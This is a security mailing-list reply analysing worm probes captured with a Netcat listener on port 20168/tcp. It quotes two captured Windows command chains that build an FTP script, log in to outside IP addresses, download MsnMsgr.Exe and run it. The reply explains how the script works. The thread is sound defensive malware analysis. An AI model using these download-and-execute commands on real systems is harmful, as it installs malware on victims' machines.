Re: New Worm or Worm Variant?

[Harlan Carvey <keydet89 () yahoo com>]

> I've been seeing a jump in 20168/tcp scans over the
> past week or so.  This port is commonly associated
> with the Lovegate worm.  

Not always a good idea to go w/ default ports.  It may
be a way to start, but most malware is configurable,
and new stuff is coming out all the time.

> I recently set up a port
> listener using Netcat to capture 
> any output from probes against a couple of my
> systems.  Shown below are the results:

Good man!  It's about time someone decided to do that
without having to be asked...

> echo open 211.26.130.118 >> wxtu.dll & echo USER
> noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo
> binary >> wxtu.dll & echo get MsnMsgr.Exe >>
> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll
> & del wxtu.dll & start MsnMsgr.Exe
>
> echo open 211.26.132.172 >> wxtu.dll & echo USER
> noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo
> binary >> wxtu.dll & echo get MsnMsgr.Exe >>
> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll
> & del wxtu.dll & start MsnMsgr.Exe
>
> At first glance it looks like some sort of
> non-interactive FTP session to download an exploit
> (MsnMsgr.Exe), 

At first glance?  That's exactly what it is!

> but Googling for wxtu.dll came up
> empty (so this could be anything from a real .dll to
> a renamed executable in my mind).  

That's b/c wxtu.dll is nothing but a text file in this
case.  The 'echo' statements and redirection are used
to create the DLL...it's not surprising (shouldn't be)
that you're not seeing references to it on Google. 
This is similar to the IRC bots a bit ago...each new
variation of the bot had different scripts and
different names, but they all used mIRC32.exe and
hidewndw.exe at their core.  Each variation simply
changed the names of the executables.  I took a look
at the RussianTopz bot, which used statistics.exe and
Teamscan32.exe, respectively.
 
> 1) Has anyone run across anything like this before? 
> This looks like something automated to me.  

That's b/c it *is* automated.
 
> 2) Any theories on wxtu.dll?  Since I can't get a
> hold of the malware to analyze it, I'm really
> guessing at this point.  

The DLL is just an FTP script file.  It's not
necessarily "malware" in and of itself.  To be honest,
the commands you captured (thanks, again, btw) are
very clear on that.

> MsnMsgr.Exe seems to be the
> exploit itself, it it appears to be using something
> like FTPCOM to do a non-interactive FTP session, but
> wxtu.dll could be anything from a real .dll file to
> a renamed executable.  Ideas?

Yeah, you're WAY off base.  While MsnMsgr.exe *is* the
malware, the DLL you keep looking at is *NOT* a real
DLL and is *NOT* executable.  It's very, very clear
from what you've sent that the DLL is nothing more
than a script file, fulled with FTP commands.  Go to
the online help on your system and look up FTP.  

BTW...what the *hell* is FTPCOM???  ;-)

HTH,

Harlan



---------------------------------------------------------------------------
----------------------------------------------------------------------------